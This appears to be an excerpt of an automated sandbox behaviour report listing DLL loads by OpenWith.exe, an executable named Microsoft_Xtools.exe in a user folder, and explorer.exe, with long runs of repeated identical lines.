Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: tiledatarepository.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: staterepository.core.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.staterepository.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: thumbcache.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: directmanipulation.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: unityplayer.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
